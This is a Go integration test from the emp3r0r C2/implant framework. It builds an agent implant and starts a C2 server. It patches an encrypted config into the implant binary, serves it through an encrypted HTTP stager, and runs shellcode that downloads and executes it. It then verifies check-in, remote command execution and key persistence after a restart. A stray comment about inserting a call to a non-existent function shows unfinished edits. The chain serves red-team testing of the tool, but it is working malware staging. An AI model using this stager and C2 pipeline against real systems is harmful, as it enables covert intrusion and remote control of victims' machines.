//go:build linux && cgo

package shellcode_stager

import (
	"bytes"
	"context"
	"crypto/ecdsa"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"encoding/asn1"
	"encoding/base64"
	"encoding/pem"
	"fmt"
	"math/big"
	"net"
	"os"
	"os/exec"
	"path/filepath"
	"strconv"
	"strings"
	"sync"
	"syscall"
	"testing"
	"time"

	"github.com/jm33-m0/emp3r0r/core/lib/logging"

	"github.com/fxamacker/cbor/v2"
	"github.com/google/uuid"
	"github.com/jm33-m0/emp3r0r/core/internal/cc/base/agents"
	"github.com/jm33-m0/emp3r0r/core/internal/cc/base/network"
	"github.com/jm33-m0/emp3r0r/core/internal/cc/config"
	"github.com/jm33-m0/emp3r0r/core/internal/cc/jobs"
	"github.com/jm33-m0/emp3r0r/core/internal/cc/server"
	"github.com/jm33-m0/emp3r0r/core/internal/def"
	"github.com/jm33-m0/emp3r0r/core/internal/live"
	"github.com/jm33-m0/emp3r0r/core/internal/transport"
	"github.com/jm33-m0/emp3r0r/core/lib/crypto"
	"github.com/jm33-m0/emp3r0r/core/lib/listener"
	"github.com/jm33-m0/emp3r0r/core/lib/util"
)

// signUUID signs the agent UUID with the CA private key
func signUUID(uuid string, keyFile string) (string, error) {
	// Read private key
	keyBytes, err := os.ReadFile(keyFile)
	if err != nil {
		return "", err
	}
	block, _ := pem.Decode(keyBytes)
	privKey, err := x509.ParseECPrivateKey(block.Bytes)
	if err != nil {
		return "", err
	}

	// Hash UUID
	hash := sha256.Sum256([]byte(uuid))

	// Sign
	r, s, err := ecdsa.Sign(rand.Reader, privKey, hash[:])
	if err != nil {
		return "", err
	}

	// Encode signature
	sig, err := asn1.Marshal(struct{ R, S *big.Int }{r, s})
	if err != nil {
		return "", err
	}

	return base64.URLEncoding.EncodeToString(sig), nil
}

func TestAgentEndToEndLifecycle(t *testing.T) {
	// Skip if CGO is not enabled
	if os.Getenv("CGO_ENABLED") != "1" {
		t.Skip("Skipping test: CGO_ENABLED is not set to 1")
	}

	// Skip if race detector is enabled (this test is long-running and doesn't need race detection)
	if os.Getenv("EMP3R0R_RACE_ON") == "1" {
		t.Skip("Skipping test: race detector is enabled")
	}

	// 1. Setup workspace
	tmpDir, err := os.MkdirTemp("", "stager_test_*")
	if err != nil {
		t.Fatalf("Failed to create temp dir: %v", err)
	}
	defer os.RemoveAll(tmpDir)
	logging.Infof("Test workspace: %s", tmpDir)

	// 2. Build Real Agent Stub (cmd/agent)
	mockAgentPath := filepath.Join(tmpDir, "agent_stub")
	// Using "real" agent code from cmd/agent
	// We use CGO_ENABLED=1 and zig cc to match production build (static-pie musl)
	cmdBuildAgent := exec.Command("go", "build",
		"-buildmode=pie",
		"-tags", "netgo agent",
		"-trimpath",
		"-ldflags", "-s -w -linkmode external -extldflags '-static -s -static-pie'",
		"-o", mockAgentPath,
		"../../../cmd/agent", // From test/ -> shellcode_stager/ -> modules/ -> core/ -> cmd/agent
	)
	cmdBuildAgent.Env = append(os.Environ(),
		"CGO_ENABLED=1",
		"CC=zig cc -target x86_64-linux-musl",
	)
	out, err := cmdBuildAgent.CombinedOutput()
	if err != nil {
		t.Fatalf("Failed to build agent stub: %v\nOutput: %s", err, string(out))
	}
	logging.Successf("Agent stub built successfully")

	// 3. Setup Real C2 Server
	c2Port := util.RandInt(50000, 60000)
	c2PortStr := fmt.Sprintf("%d", c2Port)

	// Initialize live.EmpWorkSpace for C2 server
	live.EmpWorkSpace = tmpDir
	live.IsServer = true

	// Update transport and live paths to use tmpDir
	transport.EmpWorkSpace = tmpDir
	transport.CaCrtFile = filepath.Join(tmpDir, "ca-cert.pem")
	transport.CaKeyFile = filepath.Join(tmpDir, "ca-key.pem")
	transport.ServerCrtFile = filepath.Join(tmpDir, "server-cert.pem")
	transport.ServerKeyFile = filepath.Join(tmpDir, "server-key.pem")
	transport.OperatorCaCrtFile = filepath.Join(tmpDir, "operator-ca-cert.pem")
	transport.OperatorCaKeyFile = filepath.Join(tmpDir, "operator-ca-key.pem")
	transport.OperatorServerCrtFile = filepath.Join(tmpDir, "operator-server-cert.pem")
	transport.OperatorServerKeyFile = filepath.Join(tmpDir, "operator-server-key.pem")
	transport.OperatorClientCrtFile = filepath.Join(tmpDir, "operator-client-cert.pem")
	transport.OperatorClientKeyFile = filepath.Join(tmpDir, "operator-client-key.pem")
	live.EmpConfigFile = filepath.Join(tmpDir, "emp3r0r.json")

	// Generate CA certs first
	err = config.InitCertsAndConfig()
	if err != nil {
		t.Fatalf("Failed to init certs and config: %v", err)
	}

	// Generate C2 certs using the real config package
	err = config.GenC2Certs("127.0.0.1")
	if err != nil {
		t.Fatalf("Failed to generate C2 certs: %v", err)
	}

	// Read CA cert for agent config
	caCertData, err := os.ReadFile(transport.CaCrtFile)
	if err != nil {
		t.Fatalf("Failed to read CA cert: %v", err)
	}

	// Setup transport global variables (required by C2 server)
	transport.CACrtPEM = caCertData
	transport.EmpWorkSpace = tmpDir

	// Generate agent UUID and signature
	agentUUID := uuid.New().String()
	agentTag := "test-stager-agent-" + agentUUID
	agentSig, err := signUUID(agentUUID, transport.CaKeyFile)
	if err != nil {
		t.Fatalf("Failed to sign UUID: %v", err)
	}

	// Initialize live.RuntimeConfig for the C2 server
	live.RuntimeConfig = &def.Config{
		CCPort:           c2PortStr,
		CAPEM:            string(caCertData),
		PreflightEnabled: true,
		PreflightURL:     fmt.Sprintf("https://127.0.0.1:%s/preflight-test", c2PortStr),
		PreflightMethod:  "POST",
	}

	// Reset live agent maps
	live.AgentControlMap = sync.Map{}
	live.AgentList = make([]*def.Emp3r0rAgent, 0)

	// Debug: verify maps are empty
	size := 0
	live.AgentControlMap.Range(func(key, value interface{}) bool {
		size++
		return true
	})
	logging.Debugf("AgentControlMap size after reset: %d", size)
	logging.Debugf("AgentList size after reset: %d", len(live.AgentList))

	// Small delay to ensure map reset propagates
	time.Sleep(100 * time.Millisecond)

	// Create agent config
	cfg := &def.Config{
		CCAddress:        "127.0.0.1",
		CCPort:           c2PortStr,
		CAPEM:            string(caCertData),
		C2Prefix:         "api",
		CheckInPath:      "checkin",
		MsgPath:          "msg",
		AgentUUID:        agentUUID,
		AgentUUIDSig:     agentSig,
		AgentTag:         agentTag,
		ModulePath:       "", // Empty for anonymous memory loading in test
		CCTimeout:        1000,
		PreflightEnabled: true,
		PreflightURL:     fmt.Sprintf("https://127.0.0.1:%s/preflight-test", c2PortStr),
		IsRunByStager:    true,
	}

	// Serialize to CBOR
	cborBytes, err := cbor.Marshal(cfg)
	if err != nil {
		t.Fatalf("Failed to marshal config: %v", err)
	}

	// Encrypt Config
	// Use MagicString directly, AES_GCM_Encrypt does the derivation internally (matching generate.go)
	encConfig, err := crypto.AES_GCM_Encrypt([]byte(def.MagicString), cborBytes)
	if err != nil {
		t.Fatalf("Failed to encrypt config: %v", err)
	}

	// Pad with 0x00 to match def.AgentConfig length (like generate.go)
	if len(encConfig) < len(def.AgentConfig) {
		padding := bytes.Repeat([]byte{0x00}, len(def.AgentConfig)-len(encConfig))
		encConfig = append(encConfig, padding...)
	} else if len(encConfig) > len(def.AgentConfig) {
		t.Fatalf("Config payload too large: %d > %d", len(encConfig), len(def.AgentConfig))
	}

	// Read binary
	agentBytes, err := os.ReadFile(mockAgentPath)
	if err != nil {
		t.Fatalf("Failed to read mock agent: %v", err)
	}

	// Patch
	// Placeholder is 0xff repeated for the full length of AgentConfig
	placeholder := bytes.Repeat([]byte{0xff}, len(def.AgentConfig))
	if !bytes.Contains(agentBytes, placeholder) {
		t.Fatalf("Placeholder for config not found in mock agent binary")
	}
	patchedAgentBytes := bytes.Replace(agentBytes, placeholder, encConfig, 1)

	// Create patched agent file
	patchedAgentPath := filepath.Join(tmpDir, "patched_agent")
	err = os.WriteFile(patchedAgentPath, patchedAgentBytes, 0o755)
	if err != nil {
		t.Fatalf("Failed to write patched agent: %v", err)
	}
	logging.Successf("Mock agent patched with config")

	// Dummy operator for preflight
	server.OPERATORS.Store("dummy", nil)

	// 4. Start Real C2 Server
	// Shutdown any existing server first
	if network.EmpTLSServer != nil {
		network.EmpTLSServer.Shutdown(network.EmpTLSServerCtx)
		time.Sleep(500 * time.Millisecond) // Give it time to shut down
	}

	go func() {
		logging.Infof("Starting real C2 server on port %s", c2PortStr)
		server.StartC2AgentTLSServer()
	}()

	// Ensure server cleanup at end of test
	defer func() {
		if network.EmpTLSServer != nil {
			network.EmpTLSServer.Shutdown(network.EmpTLSServerCtx)
		}
	}()

	// Wait for C2 server to be ready
	time.Sleep(2 * time.Second)

	// 5. Build Shellcode Stager
	stagerBinPath := filepath.Join(tmpDir, "stager.bin")
	stagerListenerPort := util.RandInt(60001, 65000)

	// We need to run make or compile stub.c directly.
	// Let's use gcc directly to have control (and mimic Makefile).
	// Makefile flags:
	// CFLAGS = -Wall -Wextra -Os -fno-builtin -fno-stack-protector -fPIC -nostdlib -I. ...
	// We need to set defines like -DDOWNLOAD_PORT etc.

	// We need to setup a listener for the stager to download the agent.
	// We will use core/lib/listener to serve the PATCHED AGENT.

	// Start Stager Listener
	stagerPortStr := fmt.Sprintf("%d", stagerListenerPort)
	stagerKey := "password123" // arbitrary

	go func() {
		// Serve the patched agent
		// compression=true matching standard behavior
		err := listener.HTTPAESCompressedListener(patchedAgentPath, stagerPortStr, stagerKey, true)
		if err != nil {
			logging.Errorf("Stager listener failed: %v", err)
		}
	}()
	// Wait for stager listener to be ready
	listenerReady := false
	for i := 0; i < 100; i++ {
		conn, err := net.Dial("tcp", fmt.Sprintf("127.0.0.1:%s", stagerPortStr))
		if err == nil {
			conn.Close()
			listenerReady = true
			break
		}
		time.Sleep(500 * time.Millisecond)
	}
	if !listenerReady {
		t.Fatalf("Stager listener failed to start on port %s", stagerPortStr)
	}

	// Determine flags for stub.c
	// We need the XOR mechanism as in the Makefile.
	downloadHost := "127.0.0.1"
	downloadPort := stagerPortStr
	downloadPath := "/" // listener serves at root
	downloadKey := stagerKey

	// We need to compile these. They are in the current directory (modules/shellcode_stager).
	// But we are running go test in that directory, so inputs are just filenames.

	// However, we first need to build downloader.bin and generate header like the Makefile does.
	// This makes it complicated to replicate the whole Makefile in Go test.
	// Can we just run `make`?
	// The Makefile supports environment variables.

	// Let's try running `make` with overrides.
	// We need to be careful not to overwrite the real bin files in the source dir if possible,
	// or just clean up after.
	// `make` will generate `stager.bin` in the current dir.

	// `make` will generate `stager.bin` in the current dir.

	// Clean previous build to ensure CFLAGS (ports) update triggers rebuild
	cleanCmd := exec.Command("make", "clean")
	cleanCmd.Dir = ".." // Run in parent directory where Makefile is
	cleanCmd.Run()

	makeCmd := exec.Command("make",
		fmt.Sprintf("DOWNLOAD_HOST=%s", downloadHost),
		fmt.Sprintf("DOWNLOAD_PORT=%s", downloadPort),
		fmt.Sprintf("DOWNLOAD_PATH=%s", downloadPath),
		fmt.Sprintf("DOWNLOAD_KEY=%s", downloadKey),
		"DEBUG=1",
		"SLEEP_MIN=1",
		"SLEEP_MAX=2",
	)
	makeCmd.Dir = ".."                                  // Run in parent directory where Makefile is
	makeCmd.Env = append(os.Environ(), "CGO_ENABLED=0") // Just in case
	out, err = makeCmd.CombinedOutput()
	if err != nil {
		t.Fatalf("Make failed: %v\nOutput: %s", err, string(out))
	}
	logging.Successf("Stager built with make")
	defer exec.Command("make", "clean").Run()

	// Move the generated stager.bin to tmpDir to be safe/clear
	// Use copy instead of Rename to avoid cross-device link errors
	input, err := os.ReadFile("../stager.bin") // stager.bin is in parent directory
	if err != nil {
		t.Fatalf("Failed to read stager.bin: %v", err)
	}
	err = os.WriteFile(stagerBinPath, input, 0o644)
	if err != nil {
		t.Fatalf("Failed to write stager.bin to tmp: %v", err)
	}
	os.Remove("../stager.bin")

	// 6. Build and Run Loader
	// Compile test_loader.c (in parent directory)
	loaderBinPath := filepath.Join(tmpDir, "test_loader")
	cmdBuildLoader := exec.Command("gcc", "-o", loaderBinPath, "../test_loader.c")
	out, err = cmdBuildLoader.CombinedOutput()
	if err != nil {
		t.Fatalf("Failed to build loader: %v\nOutput: %s", err, string(out))
	}

	// Run loader with stager.bin
	cmdLoader := exec.Command(loaderBinPath, stagerBinPath)

	// Capture output for debugging
	var stdout, stderr bytes.Buffer
	cmdLoader.Stdout = &stdout
	cmdLoader.Stderr = &stderr
	// Set HOME to tmpDir to isolate agent state (prevent reusing keys from ~/.emp3r0r)
	cmdLoader.Env = append(os.Environ(),
		fmt.Sprintf("HOME=%s", tmpDir),
		"STAGER_TEST=1",
	)

	logging.Infof("Running loader...")
	if err := cmdLoader.Start(); err != nil {
		t.Fatalf("Failed to start loader: %v", err)
	}

	// Wait for process exit in background
	doneChan := make(chan error, 1)
	go func() {
		doneChan <- cmdLoader.Wait()
	}()

	// Wait for checkin with timeout
	timeout := 45 * time.Second
	// Wait for agent check-in by polling live.AgentList
	start := time.Now()
	var agent *def.Emp3r0rAgent
	for {
		if time.Since(start) > timeout {
			logging.Debugf("Loader Stdout:\n%s", stdout.String())
			logging.Debugf("Loader Stderr:\n%s", stderr.String())
			t.Fatalf("Timeout waiting for agent checkin")
		}

		// Check if agent has checked in (added to AgentControlMap) AND has an active connection
		live.AgentControlMap.Range(func(key, value interface{}) bool {
			k := key.(*def.Emp3r0rAgent)
			v := value.(*live.AgentControl)
			if k.Tag != "" && v.Conn != nil { // Wait for MsgTun connection
				agent = k
				return false // stop iteration
			}
			return true
		})

		if agent != nil {
			logging.Successf("Agent checked in and connected! Tag: %s", agent.Tag)
			break
		}

		// Check if loader exited
		select {
		case err := <-doneChan:
			logging.Errorf("Loader exited unexpectedly: %v", err)
			logging.Debugf("Loader Stdout:\n%s", stdout.String())
			logging.Debugf("Loader Stderr:\n%s", stderr.String())
			t.Fatalf("Loader exited before checkin")
		default:
			// Continue polling
		}

		time.Sleep(100 * time.Millisecond)
	}

	// Verify Stager Seed Usage (Strict Check)
	agentLogs := stderr.String()
	stagerLogs := stdout.String()
	if strings.Contains(stagerLogs, "falling back to random") || strings.Contains(agentLogs, "falling back to random") {
		logging.Errorf("Agent Logs (Stderr):\n%s", agentLogs)
		logging.Errorf("Stager Logs (Stdout):\n%s", stagerLogs)
		t.Fatalf("Agent failed to use stager seed (fell back to random). Test Failed.")
	}

	// Check for new stager logs in agentLogs (which is stderr)
	if !strings.Contains(agentLogs, "Stager: Generated worker_seed") {
		t.Errorf("Stager failed to log seed generation")
	}
	if !strings.Contains(agentLogs, "Stager Child: Seed injected into SEED_FD") {
		t.Errorf("Stager failed to log seed injection")
	}

	// Check for new agent logs
	if !strings.Contains(agentLogs, "Deriving agent key from stager seed") {
		t.Errorf("Agent failed to log key derivation from seed")
	}
	if !strings.Contains(agentLogs, "Agent key derived from seed successfully") {
		t.Errorf("Agent failed to log successful key derivation")
	}

	if t.Failed() {
		logging.Errorf("Agent Logs (Stderr):\n%s", agentLogs)
		logging.Errorf("Stager Logs (Stdout):\n%s", stagerLogs)
		t.Fatalf("Log verification failed")
	}
	logging.Successf("Verified: Agent successfully derived key from stager seed and logs are present")

	// 7. Verify Command Execution (E2E)
	logging.Infof("Verifying command execution...")
	job := jobs.CreateJob("ls", "command", agent.Tag)
	cmdID := job.ID
	// Register in CmdTime so handleMessageTunnel won't drop the response
	live.CmdTime.Store(cmdID, time.Now().Format("2006-01-02 15:04:05.999999999 -0700 MST"))
	// Using "ls" command as it is ubiquitous and safer
	err = agents.SendCmd("ls", cmdID, agent)
	if err != nil {
		t.Fatalf("Failed to send command to agent: %v", err)
	}
	logging.Infof("Sent command 'ls' to agent %s", agent.Tag)

	// Wait for output
	logging.Println("Waiting for command output...")

	// Check if agent is still connected and verify output
	outputReceived := false
	for i := 0; i < 20; i++ {
		// Check connection status
		if val, ok := live.AgentControlMap.Load(agent); ok {
			a := val.(*live.AgentControl)
			if a.Conn != nil {
				// still connected
			} else {
				t.Fatalf("Agent disconnected while waiting for command output!")
			}
		}

		// Check result
		if res, ok := live.CmdResults.Load(cmdID); ok {
			output := res.(string)
			logging.Successf("Command Output received: %s", output)
			if output == "" {
				// might be empty if dir is empty, but we expect agent_stub
				// wait a bit more?
			}
			// basic check
			if len(output) > 0 {
				outputReceived = true
				break
			}
		}
		time.Sleep(1 * time.Second)
	}

	if !outputReceived {
		t.Fatalf("Failed to receive command output")
	}
	logging.Println("Command output verification passed.")

	// 8. Verify Key Persistence (Restart Test)
	logging.Infof("Testing Agent Restart & Key Persistence...")

	// Get first session key
	firstKey := ""
	if agent != nil {
		firstKey = agent.PublicKey
	}

	if firstKey == "" {
		t.Fatalf("Failed to get first session key")
	}

	// VERIFICATION: Set RunByStager to FALSE.
	// Previously this caused failure. Now it should pass because identity.go checks FD 3 automatically.
	// We need to modify the config creation above, or just rely on the fact that I modified the Config struct earlier?
	// Wait, I didn't modify the Config struct yet! I inserted a call to a non-existent function.
	// I need to go back to line 207 and change it there.
	// For now, I'll remove this invalid line.
	// Kill the agent child process to force restart
	// The loader is the parent. We need to find the child.
	// Since we can't easily find the child PID cross-platform without pgrep,
	// and we are root/same-user, we can try to find a process with PPID = loader PID.
	loaderPid := cmdLoader.Process.Pid

	// Find child using /proc (Linux specific, but this test is Linux only/CGO)
	entries, err := os.ReadDir("/proc")
	if err != nil {
		t.Fatalf("Failed to read /proc: %v", err)
	}

	childPid := 0
	for _, entry := range entries {
		if !entry.IsDir() {
			continue
		}
		// Check if name is numeric
		isNumeric := true
		for _, r := range entry.Name() {
			if r < '0' || r > '9' {
				isNumeric = false
				break
			}
		}
		if !isNumeric {
			continue
		}
		pid, _ := strconv.Atoi(entry.Name())
		statusPath := fmt.Sprintf("/proc/%d/stat", pid)
		data, err := os.ReadFile(statusPath)
		if err != nil {
			continue
		}
		// stat format: pid (comm) state ppid ...
		// We handle "comm" potentially containing spaces/parentheses
		lastParen := bytes.LastIndexByte(data, ')')
		if lastParen == -1 || lastParen+2 >= len(data) {
			continue
		}
		fields := strings.Fields(string(data[lastParen+2:]))
		if len(fields) < 2 {
			continue
		}
		// fields[0] is state (e.g. 'S'), fields[1] is ppid
		ppid, _ := strconv.Atoi(fields[1])

		if ppid == loaderPid {
			childPid = pid
			break
		}
	}

	if childPid == 0 {
		t.Fatalf("Failed to find agent child process (PPID=%d)", loaderPid)
	}

	logging.Infof("Killing agent child process %d to trigger restart...", childPid)
	syscall.Kill(childPid, syscall.SIGKILL)

	// Wait for restart (sleep cycle is 1-2s + overhead)
	logging.Infof("Waiting for agent to restart and check in again...")

	// Reset agent variable to detect new checkin
	startRestart := time.Now()
	reconnected := false

	for time.Since(startRestart) < 30*time.Second {
		live.AgentControlMap.Range(func(key, value interface{}) bool {
			k := key.(*def.Emp3r0rAgent)
			v := value.(*live.AgentControl)
			// Look for the same UUID
			if k.UUID == agent.UUID && v.Conn != nil {
				// Check PID to ensure it's a new process

				if k.Process != nil && k.Process.PID != childPid {
					// New Process detected!

					// Verify Key
					if k.PublicKey != firstKey {
						logging.Errorf("Agent Logs (Stderr):\n%s", stderr.String())
						logging.Errorf("Stager Logs (Stdout):\n%s", stdout.String())
						t.Fatalf("CRITICAL FAILURE: Agent Restarted with DIFFERENT Key!\nFirst: %s\nNew: %s", firstKey, k.PublicKey)
					}

					logging.Infof("New Agent PID: %d (Old: %d)", k.Process.PID, childPid)
					reconnected = true
					return false // stop iteration
				}
			}
			return true
		})

		if reconnected {
			logging.Successf("Agent reconnected with SAME key. Persistence verified.")
			break
		}
		time.Sleep(500 * time.Millisecond)
	}

	if !reconnected {
		t.Fatalf("Agent failed to reconnect after restart")
	}

	// Check loader status
	select {
	case err := <-doneChan:
		logging.Errorf("Loader exited after command: %v", err)
		logging.Debugf("Loader Stdout:\n%s", stdout.String())
		logging.Debugf("Loader Stderr:\n%s", stderr.String())
		t.Fatalf("Loader process died")
	default:
		logging.Println("Loader process is still running.")
	}

	// Verify stager output log contains command execution trace if possible?
	// The loader stdout captures agent stdout which is redirected to /dev/null by agent_main unless we change it.
	// In agent_main: os.Stdout = null_file
	// But logging goes to file? Or if we built with specific flags?
	// We can't verify output easily, but stability check covers the "connection drop" bug.

	logging.Successf("TestAgentEndToEndLifecycle PASSED")
	logging.Infof("Cleaning up...")
	// Cleanup
	cmdLoader.Process.Kill()
	logging.Debugf("Loader process killed")
	listener.StopHTTP()
	logging.Debugf("HTTP stager stopped")
	if network.EmpTLSServer != nil {
		// Use a context with timeout for shutdown
		ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
		defer cancel()
		network.EmpTLSServer.Shutdown(ctx)
		network.EmpTLSServerCancel()
		logging.Debugf("C2 TLS server stopped")
	}
	if network.EmpKCPCancel != nil {
		network.EmpKCPCancel()
		logging.Debugf("C2 KCP server stopped")
	}
}
